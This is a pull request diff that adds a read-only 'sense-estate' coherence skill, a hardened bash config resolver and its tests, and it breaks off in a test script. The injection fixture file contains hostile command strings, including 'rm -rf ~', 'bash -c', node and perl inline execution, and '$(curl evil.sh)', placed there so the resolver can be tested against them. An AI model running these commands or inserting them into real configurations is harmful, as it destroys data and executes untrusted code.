### PR TITLE
feat(gecko): land sense-estate doctor on main (rebased from #9)

### DIFF
--- a/.gitignore
+++ b/.gitignore
@@ -8,3 +8,10 @@ dist/
 .env
 .env.*
 .DS_Store
+
+# Operator-local estate-wiring registry for the sense-estate doctor.
+# NEVER commit the real file — it names machine-specific infra paths and is
+# operator-owned (mode 0600). The committed reference is
+# skills/sense-estate/resources/estates.example.yaml.
+estates.yaml
+.claude/estates.yaml

--- a/CLAUDE.md
+++ b/CLAUDE.md
@@ -15,6 +15,7 @@ Ecosystem intelligence for the constructs network. Observes, never prescribes.
 | `/observe` | `observe` | Single-pass — check all constructs, produce JSONL observations |
 | `/diagnose` | `diagnose` | Deep investigation — one construct, full identity-reality analysis |
 | `/report` | `report` | Synthesis — aggregate observations into network health report |
+| `/sense-estate` | `sense-estate` | Single-pass — sense an arbitrary estate (registry/state pair), emit the `STATUS\|SIGNAL\|MISMATCH` coherence tile. Sense-only. |
 
 ## The Frozen Metric
 

--- a/commands/sense-estate.md
+++ b/commands/sense-estate.md
@@ -1,0 +1,55 @@
+---
+name: "sense-estate"
+version: "0.1.0"
+description: |
+  Sense an ARBITRARY estate (a registry/state pair) and emit the minimal coherence tile
+  STATUS|SIGNAL|MISMATCH. Resolves the estate read-command from operator-local estate-config,
+  shells the estate's own doctor read-only, classifies ok/drift/blind. Sense-only.
+
+arguments:
+  - name: "estate"
+    description: "The estate slug to sense (e.g. 'recall', 'beads') — resolved against ~/.claude/estates.yaml"
+    required: true
+
+agent: "sense-estate"
+agent_path: "skills/sense-estate"
+
+context_files:
+  - path: "CLAUDE.md"
+    required: true
+  - path: "identity/persona.yaml"
+    required: true
+  - path: "identity/expertise.yaml"
+    required: false
+---
+
+# /sense-estate
+
+You are **Gecko** in estate-sense mode. Sense a single estate (a registry/state pair) and emit the
+minimal coherence tile. This is the estate-general sibling of `/observe`.
+
+## Instructions
+
+1. Resolve the estate's read-command from `~/.claude/estates.yaml` via the SAFE resolver
+   `skills/sense-estate/resources/validate-estates.sh <slug>` (never a hardcoded path).
+2. The resolver runs the validated, allowlisted, timeout-bound read-command read-only and returns
+   the estate doctor's output — or a `blind|<reason>|—` tile on any failure.
+3. Classify STATUS ∈ {ok | drift | blind} from the read (reuse the estate's own thresholds; for
+   recall/beads reuse `estate-coherence.sh`'s exact predicates).
+4. Build SIGNAL (the sensed numbers) + MISMATCH (the estate's `X ↔ Y` phrase).
+5. Escape any raw `|` in SIGNAL/MISMATCH to a space; strip control bytes.
+6. Emit EXACTLY one line: `STATUS|SIGNAL|MISMATCH`.
+7. Optionally append the observation to `grimoires/gecko/observations.jsonl` (the skill's own trail).
+
+## Voice
+
+lowercase. direct. warm. one tile line, always. blind is loud, not silent.
+
+## Constraints
+
+- Sense-only — zero act/write/dispatch verbs against estate state. No `recall-stamp.sh apply`, no
+  `align.mjs --apply`, no `gh pr`, no `br update`, no estate mutation.
+- Never hardcode a `~`-path — resolve from estate-config via the safe resolver.
+- Any probe absent / fails / parse-error → `STATUS=blind`. Never crash, never emit empty, never
+  emit more than 3 fields.
+- The skill MAY write only its OWN grimoire trail — never the observed estate.

--- a/construct.yaml
+++ b/construct.yaml
@@ -2,7 +2,7 @@ schema_version: 3
 name: Gecko
 slug: gecko
 version: 0.1.0
-description: "Health monitoring for the construct ecosystem. Runs automated checks, detects when constructs drift from their documentation, and tracks lifecycle status. Five skills: patrol (automated network loops), observe (single network check), diagnose (deep investigation), report (findings summary), sweep-bonfire (walks the operator's local working copies and emits to the wall — sibling altitude to patrol)."
+description: "Health monitoring for the construct ecosystem. Runs automated checks, detects when constructs drift from their documentation, and tracks lifecycle status. Six skills: patrol (automated network loops), observe (single network check), diagnose (deep investigation), report (findings summary), sweep-bonfire (walks the operator's local working copies and emits to the wall — sibling altitude to patrol), sense-estate (senses an arbitrary estate's coherence and emits a STATUS|SIGNAL|MISMATCH tile — the portable, fail-closed immune-relay doctor)."
 short_description: "Construct network health monitoring"
 author: 0xHoneyJar
 license: MIT
@@ -24,6 +24,8 @@ skills:
     path: skills/report
   - slug: sweep-bonfire
     path: skills/sweep-bonfire
+  - slug: sense-estate
+    path: skills/sense-estate
 
 commands:
   - name: patrol
@@ -36,6 +38,8 @@ commands:
     path: commands/report.md
   - name: sweep-bonfire
     path: commands/sweep-bonfire.md
+  - name: sense-estate
+    path: commands/sense-estate.md
 
 repository:
   url: https://github.com/0xHoneyJar/construct-gecko.git

--- a/skills/sense-estate/SKILL.md
+++ b/skills/sense-estate/SKILL.md
@@ -1,0 +1,172 @@
+---
+name: sense-estate
+description: "Single-pass coherence sense of an ARBITRARY estate (a registry/state pair). Resolves the read-command from operator-local estate-config, shells the estate's own doctor read-only, emits exactly the STATUS|SIGNAL|MISMATCH tile. Sense-only — never mutates the estate."
+allowed-tools: [Bash, Read, Grep, Glob, Write, Edit]
+user-invocable: true
+---
+
+# Sense-Estate — Generalized Coherence Doctor (sense-only)
+
+## Purpose
+
+Sense an **arbitrary estate** — a *registry/state pair* (the "declared" side and the
+"governed/surfaced" side that should match) — and emit the minimal coherence tile. This is the
+estate-general sibling of `observe`: same single-pass, structured, **sense-only** shape, but the
+target is any estate (`recall`, `beads`, …) instead of the construct registry.
+
+It generalizes the live `estate-coherence.sh` `probe_*` pattern (`probe_recall`, `probe_beads`) into
+one reusable skill: read the estate's existing on-disk doctor, wrap the read into the tile. It does
+NOT re-implement recall indexing or beads alignment, and it does NOT decide whether the estate is
+healthy beyond emitting the correct STATUS — the silence render-rule lives downstream in
+`estate-coherence.sh` (not here).
+
+## Invocation
+
+```bash
+/sense-estate recall            # sense the recall estate (resolves read_command from estates.yaml)
+/sense-estate beads             # sense the beads estate
+/sense-estate <slug>            # sense any estate wired in ~/.claude/estates.yaml
+```
+
+## The output contract — the tile (HARD constraint)
+
+The skill emits **exactly one line**, three pipe-delimited fields, nothing else on stdout:
+
+```
+STATUS|SIGNAL|MISMATCH
+```
+
+- `STATUS ∈ {ok | drift | blind}` — exactly the three values the consumer
+  (`estate-coherence.sh:143`) branches on.
+- `SIGNAL` — a single human-readable string describing the sensed numbers.
+- `MISMATCH` — the estate's own `X ↔ Y` phrase naming the two-things-that-should-match.
+
+This is byte-compatible with what `estate-coherence.sh --json` splits on `|` into
+`{estate,status,signal,mismatch}` (`estate-coherence.sh:147-157`). The consumer split MUST yield
+**exactly 3 fields** — so any raw `|` inside SIGNAL or MISMATCH MUST be escaped to a space before
+emission (see Delimiter safety).
+
+Grounded examples from the live probes:
+
+| estate | tile (live) |
+|---|---|
+| recall | `ok\|mode=query · 0 unstamped · 0 phantom · 142 cols\|indexed ↔ surfaced (declared ↔ governed)` |
+| beads  | `drift\|412 beads · aligned 4% · 18 drift · 96 stale\|filed ↔ governed (carries a canonical Lab dim)` |
+| (unreachable) | `blind\|recall-doctor unavailable\|—` |
+
+## Portability — the read-command is RESOLVED, never hardcoded (Cluster B)
+
+The skill MUST NOT bake a `~/.claude/...` or `~/bonfire/...` path. It resolves the estate's
+read-command from the **operator-local estate-config** `~/.claude/estates.yaml` (a slug →
+`{read_command, …}` map), via the safe resolver in `resources/validate-estates.sh`. The committed
+skill carries only the estate slug + the `$STRAYLIGHT_ESTATE` / `$BEADS_ESTATE` indirection tokens;
+the concrete path resolves at the operator's machine.
+
+The estate-config schema + an EXAMPLE live in this skill's `resources/`:
+
+| file | role |
+|---|---|
+| `resources/estates.example.yaml` | the slug→`{read_command}` schema reference (copy to `~/.claude/estates.yaml`, then `chmod 600`) |
+| `resources/validate-estates.sh` | the SAFE resolver/validator — parses with `yq`/`jq` (never bash `eval`), enforces argv-array form, restricts interpreter args, binds a `timeout`, fails CLOSED to `blind` |
+
+## Workflow
+
+### Step 1: Resolve the read-command (SAFE)
+
+Given the estate slug, run the resolver to obtain the validated argv-array read-command — never
+construct it by string-splicing:
+
+```bash
+# Emits the validated argv as a JSON array on success, or "blind|<reason>|—" on any failure.
+bash skills/sense-estate/resources/validate-estates.sh "$ESTATE_SLUG"
+```
+
+The resolver reads `~/.claude/estates.yaml` (or `$LOA_ESTATES_FILE` for tests), and for the given
+slug:
+- parses the YAML with `yq -o=json` (a real parser — **NEVER** `eval`, **NEVER** word-splitting);
+- requires every `*_command` to be a YAML **array of strings** (argv form);
+- requires `argv[0]` to be in the binary allowlist `{bash, sh, node, python3, jq}`;
+- **rejects interpreter smuggling** — for `bash`/`sh`/`node`/`python3`, the args MUST be a script
+  PATH (and its flags), and a `-e` / `-c` / `--eval` / `-` (read-from-stdin) arg is **rejected**;
+- rejects any element carrying a shell metacharacter outside a bare `$NAME` token;
+- token-expands only `$NAME` (`^[A-Z_][A-Z0-9_]*$`) from the `tokens:` map / process env.
+
+Any reject, a missing/unparseable file, an unknown slug, or perms looser than `0600` → the resolver
+prints a `blind|<reason>|—` line and exits non-zero. **You then emit that blind tile and STOP** —
+never fall back to a guessed path.
+
+### Step 2: Run the estate's doctor read-only (timeout-bound)
+
+The resolver itself runs the validated argv under a `timeout` (default 15s) with `shell=False`
+semantics (`"${cmd[@]}"`, never `eval`). It captures stdout. You do NOT re-spawn the command
+yourself — let the resolver do the bounded, allowlisted exec. Read sources (resolved via the slug,
+documented here for orientation, NOT hardcoded):
+
+| estate | what is read | resolved token form (estates.yaml) | fields lifted |
+|---|---|---|---|
+| `recall` | the recall-doctor JSON receipt | `["bash", "$STRAYLIGHT_ESTATE/recall-doctor.sh", "--json"]` | `mode.{default,ok}`, `coverage.{indexed,phantoms[]}`, `unstamped_recent[]`, `freshness_min` |
+| `beads`  | the pre-written commons report | `report_path: "$BEADS_ESTATE/commons-report.json"` (cheap SLURP — read, not exec) or `["node", "$BEADS_ESTATE/monitor.mjs", "--json"]` | `alignPct`, `estate.{beads,drift,stale}` |
+
+### Step 3: Classify STATUS (from the read, not a global judgment)
+
+| STATUS | When | Grounded rule |
+|---|---|---|
+| `blind` | the read-command is unresolvable / absent / errors / parse fails | recall: doctor unavailable / errored / parse fail (`estate-coherence.sh:32-34,42`); beads: no commons-report (`estate-coherence.sh:48`) |
+| `drift` | a declared↔governed match is broken per the estate's thresholds | recall: `!modeOk \|\| unstamped>0 \|\| phantoms>0 \|\| freshness>1440` (`estate-coherence.sh:37`); beads: `alignPct<50 \|\| drift>20 \|\| stale>100` (`estate-coherence.sh:52`) |
+| `ok` | declared and governed agree within thresholds | the silence case — the render layer dims it (`estate-coherence.sh:8-10`) |
+
+The thresholds are the estate's own (the source of truth stays the per-estate doctor). For recall and
+beads, reuse the exact predicates `estate-coherence.sh` already applies (above) so the tile is
+byte-compatible.
+
+### Step 4: Build SIGNAL + MISMATCH
+
+- `SIGNAL` — one line summarizing the lifted numbers. Reuse the live phrasings:
+  - recall: `mode=<default> · <N> unstamped · <N> phantom · <N> cols`
+  - beads: `<N> beads · aligned <P>% · <N> drift · <N> stale`
+- `MISMATCH` — the estate's `X ↔ Y` phrase (`mismatch_phrase` from estates.yaml, or the live default):
+  - recall: `indexed ↔ surfaced (declared ↔ governed)`
+  - beads: `filed ↔ governed (carries a canonical Lab dim)`
+
+### Step 5: Delimiter safety, then emit (fault-tolerant)
+
+Before emitting, **escape any raw `|`** in SIGNAL and MISMATCH to a space, and strip C0/C1 control
+bytes, so the line is always parseable into exactly 3 fields. Then print the single tile line:
+
+```
+printf '%s|%s|%s\n' "$STATUS" "$SIGNAL" "$MISMATCH"
+```
+
+**Fault-tolerance (hard):** any probe absent / fails / parse-errors → `STATUS=blind`, a one-word
+reason in SIGNAL, `—` in MISMATCH. **Never crash, never emit an empty line, never emit more than 3
+fields.** Blind is loud, not silent — it is the immune-system "silence is the bug" signal.
+
+### Step 6 (optional): record the observation trail
+
+Like `observe`, the skill MAY append its own observation to `grimoires/gecko/observations.jsonl`
+(its OWN trail) — never the observed estate. One JSONL line, `stream_type: "Signal"`:
+
+```json
+{"timestamp":"…Z","stream_type":"Signal","schema_version":"1.0.0","estate":"recall","status":"ok","signal":"mode=query · 0 unstamped · 0 phantom · 142 cols","mismatch":"indexed ↔ surfaced (declared ↔ governed)"}
+```
+
+## Outputs
+
+| Path | Description |
+|------|-------------|
+| stdout | the single `STATUS\|SIGNAL\|MISMATCH` tile line (the contract) |
+| `grimoires/gecko/observations.jsonl` | OPTIONAL append-only observation trail (the skill's own — never the estate) |
+
+## Constraints — sense-only (the hard boundary, G-4 / A-2)
+
+- **Zero act/write/dispatch verbs against estate state.** No `gh pr`, no `br update`, no
+  `recall-stamp.sh apply`, no `align.mjs --apply`, no mutation of recall/beads/any estate's governed
+  data. The doctor SENSES; the aligner/teeth (a SEPARATE construct) act.
+- The skill MAY write only its OWN GECKO-grimoire trail (Step 6), exactly as `observe` does — never
+  the observed estate.
+- Adding this skill adds **no `workflow.gates`** to `construct.yaml` and never will. GECKO stays
+  sense-only.
+- Never extrapolate — if a number cannot be read, it is `blind`, not a guess.
+- Never re-implement the estate's doctor — shell its existing read-command (resolved, allowlisted,
+  timeout-bound). The numbers' source of truth stays the per-estate doctor.
+- Never hardcode a `~`-path — resolve from `~/.claude/estates.yaml` via the safe resolver.

--- a/skills/sense-estate/index.yaml
+++ b/skills/sense-estate/index.yaml
@@ -1,0 +1,34 @@
+slug: sense-estate
+name: "Estate Coherence Sense"
+version: 0.1.0
+
+description: |
+  Use this skill to sense an ARBITRARY estate (a registry/state pair) and emit the minimal
+  coherence tile STATUS|SIGNAL|MISMATCH. The estate-general sibling of observe: resolves the
+  estate's read-command from operator-local estate-config (never a hardcoded path), shells the
+  estate's own doctor read-only, classifies ok/drift/blind. Sense-only — never mutates the estate.
+
+triggers:
+  - "/sense-estate"
+  - "sense the recall estate"
+  - "sense the beads estate"
+  - "estate coherence tile"
+  - "is this estate drifting"
+
+entry: SKILL.md
+
+capabilities:
+  model_tier: sonnet
+  danger_level: safe
+  effort_hint: medium
+  downgrade_allowed: true
+  execution_hint: sequential
+  requires:
+    tool_calling: true
+    native_runtime: false
+    thinking_traces: false
+    vision: false
+
+outputs:
+  - path: "grimoires/gecko/observations.jsonl"
+    description: "OPTIONAL append-only observation trail (the skill's own — never the observed estate)"

--- a/skills/sense-estate/resources/estates.example.yaml
+++ b/skills/sense-estate/resources/estates.example.yaml
@@ -1,0 +1,54 @@
+# estates.example.yaml — EXAMPLE estate-wiring registry for the sense-estate doctor.
+#
+# This is the COMMITTED reference. The OPERATOR copies it to ~/.claude/estates.yaml,
+# edits the token defaults for their machine, then `chmod 600 ~/.claude/estates.yaml`.
+#
+#   cp skills/sense-estate/resources/estates.example.yaml ~/.claude/estates.yaml
+#   chmod 600 ~/.claude/estates.yaml
+#
+# The real file is OPERATOR-OWNED, machine-specific, and NOT committed to any repo.
+# .gitignore it (this skill ships a .gitignore guidance note in resources/README is NOT
+# needed; the repo .gitignore should carry `estates.yaml` and `.claude/estates.yaml`).
+#
+# RESOLUTION CONTRACT: a construct/skill carries only the estate SLUG (e.g. "recall") + the
+# $STRAYLIGHT_ESTATE / $BEADS_ESTATE indirection token. The resolver looks the slug up here and
+# reads the typed fields below. The committed artifact never bakes a path.
+#
+# SAFETY: every `*_command` is a YAML argv-ARRAY (never a string). An array maps 1:1 onto argv with
+# shell=False / "${cmd[@]}", so a row value can never become a second command. The resolver
+# (validate-estates.sh) enforces: argv[0] in the binary allowlist; no -e/-c/--eval/- interpreter
+# smuggling; no shell metacharacters; only $NAME token substitution; a timeout on every probe.
+
+version: "1.0"
+last_edited: "2026-06-02"
+
+estates:
+  recall:
+    kind: doctor+aligner
+    # The recall doctor's machine-readable receipt (read-only).
+    read_command: ["bash", "$STRAYLIGHT_ESTATE/recall-doctor.sh", "--json"]
+    # Optional unified read source (the consolidated coherence verdict).
+    coherence_command: ["bash", "$STRAYLIGHT_ESTATE/estate-coherence.sh", "--json"]
+    freshness_threshold_min: 1440
+    mismatch_phrase: "indexed ↔ surfaced (declared ↔ governed)"
+
+  beads:
+    kind: doctor+aligner
+    # The beads monitor's machine-readable output (exec form).
+    read_command: ["node", "$BEADS_ESTATE/monitor.mjs", "--json"]
+    # Cheap pre-written read: a SLURP (read, not exec) of the already-generated report.
+    report_path: "$BEADS_ESTATE/commons-report.json"
+    mismatch_phrase: "filed ↔ governed (carries a canonical Lab dim)"
+
+  github:
+    kind: doctor+aligner+teeth
+    # NOTE: teeth/enforce is OUT OF SCOPE for the sense-estate doctor (sense-only).
+    # This row exists only so the doctor can sense the github estate; the enforce_command
+    # is consumed by a SEPARATE act-construct, never by this skill.
+    mismatch_phrase: "declared ↔ enforced (taxonomy has teeth)"
+
+# Operator-set token defaults (the $… expansions). Only [A-Z_][A-Z0-9_]* names honored.
+# Precedence: tokens-map value (operator override) > process env > the value here.
+tokens:
+  STRAYLIGHT_ESTATE: "$HOME/.claude/scripts/straylight-estate"
+  BEADS_ESTATE: "$HOME/bonfire/beads-estate"

--- a/skills/sense-estate/resources/validate-estates.sh
+++ b/skills/sense-estate/resources/validate-estates.sh
@@ -1,0 +1,237 @@
+#!/usr/bin/env bash
+# =============================================================================
+# validate-estates.sh — SAFE estate-config resolver for the sense-estate doctor.
+# =============================================================================
+# Resolves an estate SLUG against the operator-local estate-wiring registry
+# (~/.claude/estates.yaml), validates the read-command, and — on `resolve` —
+# runs it read-only under a timeout. Fails CLOSED to a `blind|<reason>|—` tile
+# on ANY problem (missing file, bad perms, unknown slug, malformed command,
+# interpreter smuggling, metacharacter, timeout, parse error).
+#
+# It NEVER uses bash `eval`, NEVER word-splits a command string, NEVER spawns a
+# shell to expand the command. Commands are YAML argv-ARRAYS parsed with `yq`
+# and executed via "${cmd[@]}" (shell=False semantics) under `timeout`.
+#
+# Usage:
+#   validate-estates.sh <slug>                 # resolve + run the read-command read-only
+#   validate-estates.sh --argv <slug>          # print the validated argv as a JSON array, no exec
+#   validate-estates.sh --check <slug>         # validate only; exit 0 if the row is safe
+#   validate-estates.sh --file <path> <slug>   # use an explicit estates.yaml (tests)
+#
+# Env:
+#   LOA_ESTATES_FILE   override the estates.yaml path (test seam; same as --file)
+#   LOA_ESTATE_TIMEOUT probe timeout seconds (default 15)
+#   STRAYLIGHT_ESTATE / BEADS_ESTATE / any $NAME token — token expansion source
+#
+# Exit codes:
+#   0 = safe (and, for resolve, the probe ran; its output is on stdout)
+#   3 = fail-closed-to-blind (a `blind|<reason>|—` tile is printed to stdout)
+#   2 = usage error
+#
+# Output on failure is ALWAYS a single valid 3-field tile line, so a consumer
+# that splits on `|` always gets exactly 3 fields. NEVER empty, NEVER a crash.
+# =============================================================================
+set -uo pipefail
+
+ALLOWED_BINS="bash sh node python3 jq"
+TIMEOUT_SECS="${LOA_ESTATE_TIMEOUT:-15}"
+
+# ---- emit a fail-closed blind tile and exit 3 -------------------------------
+blind() {
+  # delimiter-escape: strip raw | and control bytes from the reason so the tile
+  # is always exactly 3 fields.
+  local reason
+  reason=$(printf '%s' "${1:-unknown}" | tr '|' ' ' | tr -d '\000-\037')
+  printf 'blind|%s|—\n' "$reason"
+  exit 3
+}
+
+usage() {
+  sed -n '5,30p' "${BASH_SOURCE[0]}" | sed 's/^# \{0,1\}//' >&2
+  exit 2
+}
+
+# ---- a bounded runner (timeout > gtimeout > unbounded-warn) ----------------
+run_bounded() {
+  if command -v timeout >/dev/null 2>&1; then
+    timeout "${TIMEOUT_SECS}s" "$@"
+  elif command -v gtimeout >/dev/null 2>&1; then
+    gtimeout "${TIMEOUT_SECS}s" "$@"
+  else
+    echo "[validate-estates] WARNING: no timeout binary; running unbounded" >&2
+    "$@"
+  fi
+}
+
+# ---- arg parse --------------------------------------------------------------
+MODE=resolve
+EXPLICIT_FILE=""
+SLUG=""
+while [[ $# -gt 0 ]]; do
+  case "$1" in
+    -h|--help)  usage ;;
+    --argv)     MODE=argv;  shift ;;
+    --check)    MODE=check; shift ;;
+    --file)     EXPLICIT_FILE="${2:-}"; shift 2 || usage ;;
+    -*)         echo "[validate-estates] ERROR: unknown flag $1" >&2; exit 2 ;;
+    *)          if [[ -z "$SLUG" ]]; then SLUG="$1"; else echo "[validate-estates] ERROR: unexpected arg $1" >&2; exit 2; fi; shift ;;
+  esac
+done
+[[ -n "$SLUG" ]] || usage
+
+# slug must be a tame identifier (no traversal, no metacharacters)
+[[ "$SLUG" =~ ^[a-z0-9][a-z0-9_-]*$ ]] || blind "invalid slug"
+
+# ---- locate the estates file ------------------------------------------------
+EST_FILE="${EXPLICIT_FILE:-${LOA_ESTATES_FILE:-$HOME/.claude/estates.yaml}}"
+[[ -f "$EST_FILE" ]] || blind "estates.yaml absent ($EST_FILE)"
+
+command -v yq >/dev/null 2>&1 || blind "yq v4+ required"
+command -v jq >/dev/null 2>&1 || blind "jq required"
+
+# ---- perms check (warn-only; loose perms are a misconfig SIGNAL, not fatal) --
+# The real ~/.claude/estates.yaml should be 0600. A test/explicit fixture is exempt.
+if [[ -z "$EXPLICIT_FILE" && -z "${LOA_ESTATES_FILE:-}" ]]; then
+  perm=$(stat -f '%Lp' "$EST_FILE" 2>/dev/null || stat -c '%a' "$EST_FILE" 2>/dev/null || echo "")
+  if [[ -n "$perm" && "$perm" != "600" ]]; then
+    echo "[validate-estates] WARNING: $EST_FILE perms are $perm, expected 600" >&2
+  fi
+fi
+
+# ---- parse with a REAL parser (yq → JSON), never eval -----------------------
+EST_JSON=$(yq -o=json '.' "$EST_FILE" 2>/dev/null) || blind "estates.yaml failed to parse"
+[[ -n "$EST_JSON" && "$EST_JSON" != "null" ]] || blind "estates.yaml empty/unparseable"
+
+# slug present?
+present=$(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" '(.estates[$s] // empty) | type' 2>/dev/null || echo "")
+[[ "$present" == "object" ]] || blind "unknown estate slug: $SLUG"
+
+# ---- which command field? read_command, else coherence_command --------------
+CMD_FIELD="read_command"
+has_read=$(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" '(.estates[$s].read_command != null)')
+if [[ "$has_read" != "true" ]]; then
+  has_coh=$(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" '(.estates[$s].coherence_command != null)')
+  if [[ "$has_coh" == "true" ]]; then
+    CMD_FIELD="coherence_command"
+  else
+    blind "estate $SLUG declares no read_command"
+  fi
+fi
+
+# ---- the command MUST be an array of strings (argv form) --------------------
+# A STRING command is the word-split injection surface — reject it here.
+cmd_type=$(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" --arg f "$CMD_FIELD" '(.estates[$s][$f]) | type')
+[[ "$cmd_type" == "array" ]] || blind "$CMD_FIELD for $SLUG is not an argv array"
+
+all_strings=$(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" --arg f "$CMD_FIELD" \
+  '[.estates[$s][$f][] | type] | all(. == "string")')
+[[ "$all_strings" == "true" ]] || blind "$CMD_FIELD elements must all be strings"
+
+len=$(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" --arg f "$CMD_FIELD" '.estates[$s][$f] | length')
+[[ "$len" =~ ^[0-9]+$ && "$len" -ge 1 ]] || blind "$CMD_FIELD is empty"
+
+# ---- read elements into a bash array, base64-per-element (NUL-safe, no eval) -
+# Each argv element is base64-encoded by jq (one per line), then decoded into a
+# bash array. base64 has no shell metacharacters, so this transport preserves
+# elements verbatim (spaces, unicode, even embedded NULs) with ZERO word-split
+# and ZERO eval.
+RAW_ELEMS=()
+while IFS= read -r b64; do
+  [[ -z "$b64" ]] && continue
+  RAW_ELEMS+=("$(printf '%s' "$b64" | base64 -d 2>/dev/null)")
+done < <(printf '%s' "$EST_JSON" | jq -r --arg s "$SLUG" --arg f "$CMD_FIELD" '.estates[$s][$f][] | @base64')
+[[ ${#RAW_ELEMS[@]} -ge 1 ]] || blind "$CMD_FIELD produced no argv elements"
+
+# ---- metacharacter + smuggling guard (per element) --------------------------
+# A safe element is either a bare leading-$NAME token (expanded below) or a plain
+# literal with NO shell metacharacters. Reject any element carrying:
+#   ; & | > < ` $( ) { } — or a $ that is not a bare leading $NAME token.
+reject_meta() {
+  local s="$1"
+  case "$s" in
+    *';'*|*'&'*|*'|'*|*'<'*|*'>'*|*'`'*|*'$('*|*'{'*|*'}'*) blind "metacharacter in $CMD_FIELD element" ;;
+  esac
+  if [[ "$s" == *'$'* ]] && ! [[ "$s" =~ ^\$[A-Z_][A-Z0-9_]*(/[A-Za-z0-9._/-]*)?$ ]]; then
+    blind "unsafe \$ expansion in $CMD_FIELD element"
+  fi
+}
+
+# ---- token-expansion: ONLY a bare leading $NAME, from tokens-map/env ---------
+expand_token() {
+  local s="$1"
+  if [[ "$s" =~ ^\$([A-Z_][A-Z0-9_]*)(/.*)?$ ]]; then
+    local name="${BASH_REMATCH[1]}" tail="${BASH_REMATCH[2]}" val
+    val=$(printf '%s' "$EST_JSON" | jq -r --arg n "$name" '(.tokens[$n] // empty)')   # tokens-map first
+    [[ -z "$val" ]] && val="${!name:-}"                                                # then process env
+    [[ -z "$val" ]] && blind "unresolved token \$$name"
+    val="${val/\$HOME/$HOME}"                                                          # single-level $HOME
+    printf '%s%s' "$val" "$tail"
+    return 0
+  fi
+  printf '%s' "$s"
+}
+
+CMD=()
+for el in "${RAW_ELEMS[@]}"; do
+  reject_meta "$el"
+  CMD+=("$(expand_token "$el")")
+done
+[[ ${#CMD[@]} -ge 1 ]] || blind "empty argv after expansion"
+
+# ---- argv[0] binary allowlist ----------------------------------------------
+bin0="${CMD[0]}"
+base0="${bin0##*/}"
+case " $ALLOWED_BINS " in
+  *" $base0 "*) : ;;
+  *) blind "interpreter '$base0' not in allowlist" ;;
+esac
+
+# ---- interpreter-arg restriction: script-path only, no -e/-c/--eval/- -------
+# For bash/sh/node/python3 the FIRST non-flag argument MUST be an existing script
+# PATH. Reject inline-eval flags and read-from-stdin, which smuggle code.
+case "$base0" in
+  bash|sh|node|python3)
+    saw_script=0
+    for ((i=1; i<${#CMD[@]}; i++)); do
+      a="${CMD[$i]}"
+      case "$a" in
+        -e|-c|--eval|--exec|-) blind "interpreter eval/stdin flag rejected: $a" ;;
+        --) continue ;;
+        -*) continue ;;          # other flags
+        *)
+          if [[ $saw_script -eq 0 ]]; then
+            saw_script=1
+            [[ -f "$a" ]] || blind "script path absent: $a"
+          fi
+          ;;
+      esac
+    done
+    [[ $saw_script -eq 1 ]] || blind "$base0 invoked without a script path"
+    ;;
+  jq)
+    : # jq with a filter expr is allowed (no script-path requirement)
+    ;;
+esac
+
+# ---- argv mode: print the validated argv as JSON, no exec -------------------
+# Build the JSON array WITHOUT jq --args (jq 1.6's --args mis-parses a positional
+# that looks like a flag, e.g. "--json"). Feed each element base64-encoded (one
+# per line) so the transport carries no metacharacters, then decode inside jq.
+if [[ "$MODE" == "argv" ]]; then
+  for el in "${CMD[@]}"; do printf '%s' "$el" | base64 | tr -d '\n'; printf '\n'; done \
+    | jq -R '@base64d' | jq -sc '.'
+  exit 0
+fi
+
+# ---- check mode: validation only -------------------------------------------
+if [[ "$MODE" == "check" ]]; then
+  echo "[validate-estates] OK: $SLUG → ${CMD[*]}" >&2
+  exit 0
+fi
+
+# ---- resolve mode: run the read-command READ-ONLY, timeout-bound -----------
+# shell=False semantics: "${CMD[@]}" — never eval, never a shell string.
+out=$(run_bounded "${CMD[@]}" 2>/dev/null) || blind "probe failed/timed out: $base0"
+[[ -n "$out" ]] || blind "probe produced no output: $base0"
+printf '%s\n' "$out"
+exit 0

--- a/tests/fixtures/estates.good.yaml
+++ b/tests/fixtures/estates.good.yaml
@@ -1,0 +1,15 @@
+# GOOD fixture — a safe estates.yaml with argv-array commands.
+version: "1.0"
+estates:
+  echotest:
+    kind: doctor
+    # bash + a script path under $FIXTURE_DIR; --json is a script-side flag.
+    read_command: ["bash", "$FIXTURE_DIR/probe-ok.sh", "--json"]
+    mismatch_phrase: "declared ↔ governed"
+  absent:
+    kind: doctor
+    # script path does not exist → resolver must fail CLOSED to blind.
+    read_command: ["bash", "$FIXTURE_DIR/does-not-exist.sh"]
+    mismatch_phrase: "declared ↔ governed"
+tokens:
+  FIXTURE_DIR: "PLACEHOLDER_FIXTURE_DIR"

--- a/tests/fixtures/estates.injection.yaml
+++ b/tests/fixtures/estates.injection.yaml
@@ -1,0 +1,35 @@
+# INJECTION fixtures — each estate carries an attack the resolver MUST reject (→ blind).
+version: "1.0"
+estates:
+  # 1. shell metacharacter (command chaining) inside an argv element
+  metachar:
+    kind: doctor
+    read_command: ["bash", "$FIXTURE_DIR/probe-ok.sh; rm -rf ~", "--json"]
+    mismatch_phrase: "x ↔ y"
+  # 2. interpreter inline-eval smuggling (bash -c)
+  evalsmuggle:
+    kind: doctor
+    read_command: ["bash", "-c", "echo pwned"]
+    mismatch_phrase: "x ↔ y"
+  # 3. node -e inline-eval smuggling
+  nodeeval:
+    kind: doctor
+    read_command: ["node", "-e", "require('child_process').execSync('id')"]
+    mismatch_phrase: "x ↔ y"
+  # 4. command field is a STRING, not an argv array (word-split surface)
+  stringcmd:
+    kind: doctor
+    read_command: "bash $FIXTURE_DIR/probe-ok.sh; rm -rf ~"
+    mismatch_phrase: "x ↔ y"
+  # 5. interpreter not in the allowlist
+  badbin:
+    kind: doctor
+    read_command: ["perl", "-e", "system('id')"]
+    mismatch_phrase: "x ↔ y"
+  # 6. command-substitution token
+  cmdsub:
+    kind: doctor
+    read_command: ["bash", "$(curl evil.sh)"]
+    mismatch_phrase: "x ↔ y"
+tokens:
+  FIXTURE_DIR: "PLACEHOLDER_FIXTURE_DIR"

--- a/tests/fixtures/probe-ok.sh
+++ b/tests/fixtures/probe-ok.sh
@@ -1,0 +1,9 @@
+#!/usr/bin/env bash
+# A stand-in estate doctor for tests. Prints a recall-shaped JSON receipt, OR a
+# raw tile line if asked. It emits a pipe in its output so the tile-escape test
+# has something to escape. Read-only; harmless.
+set -euo pipefail
+case "${1:-}" in
